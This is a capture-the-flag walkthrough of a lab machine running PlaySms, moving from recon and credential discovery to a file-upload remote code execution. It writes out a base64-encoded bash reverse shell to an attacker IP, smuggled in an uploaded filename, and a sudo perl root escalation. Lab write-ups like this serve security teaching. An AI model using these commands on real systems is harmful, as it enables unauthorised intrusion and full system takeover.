- Remote Code Execution
- Unrestricted File Upload
Solved by: 47Suriya
The IP of the target machine is found by using Netdiscover tool.
IP of the Machine is 192.168.1.165
First, Nmap scanner is used to find all the open ports and services running.
This scan reveals that there is only 1 open port which is port 80. Also an Apache server is hosted and this scan also reveals that there is a robots.txt file which disallows 5 directories.
When navigated to the page hosted by the Apache server:
This page revealed no important information. As there was a robots.txt file present, let’s try checking the disallowed directories.
While checking the nothing directory, the page contained no useful information.
When the page source was checked:
A bunch of passwords was revealed. These might be useful.
It’s time to do some more recon.
Nikto Web scanner is used here to scan for any possible vulnerabilities and information.
This scan revealed that there was a directory secure which was not mentioned in the robots.txt file.
Now Dirb web content scanner is used to find some information about some hidden directories.
This scan also revealed that there is a directory secure which was already found by the nikto scan.
This directory might contain something useful. Time to check it out:
This directory contained a file backup.zip. When checking that out, it asked for a password.
When trying out the passwords which was found in the nothing directory, the password “freedom” worked.
After extracting, a mp3 file was found. This might be a file that can contain some useful information. So it worked when trying to cat that file:
And that file contained a username and a hidden password. And also there was a URL mentioned. When checking that out:
That URL led to a web application named PlaySms. And it asked for login credentials. As there was a username “touhid” mentioned in the backup-cred.mp3 file, it might be worth trying that.
But in order to find the password, the only source was from the bunch of passwords in the nothing directory. When trying that one by one, the password “diana” worked here.
And now there was access to the web application.
While searching about this PlaySms Web Application, there was a potential exploit which took advantage of Remote Code Execution and Unrestricted File Upload vulnerability.
Looking at the description:
This tells that when a php file with a filename is uploaded using sendfromfile option in the application, the filename gets executed. In order to check whether this exploits works, the filename which was given in the description is used.
And when uploaded:
Perfect! The script is getting executed.
Now time to exploit this by uploading a reverse shell payload in the place of ‘uname -a’ in the filename.
The payload which is going to be used here is:
bash -i >& /dev/tcp/192.168.1.222/1234 0>&1
But in order to execute this, we have to upload it in the place of the filename. But a filename can’t contain slashes. So in order to bypass it, the payload should be encoded into base64 and uploaded. After that it should get decoded and executed.
The encoded payload: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo=
And instead of that uname -a inside the single quotes, the payload below is placed to spawn a reverse tcp shell.
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo= | base64 -d | bash
So the name of the file will be:
Before uploading the file, a netcat listener is started on port 1234 as mentioned in the payload. And then the file is uploaded which will spawn a reverse shell.
Then the sudo permissions is checked using the command ‘sudo -l’
This shows that the perl commands can be run as root. So when it is used to create a shell with sudo command, a root shell will be spawned.
So for spawning a bash shell with perl the command below is used:
sudo /usr/bin/perl -e 'exec "/bin/bash";'
Finally, root shell is spawned. And the flag is found which is present in the /root directory.
The challenge is now complete!!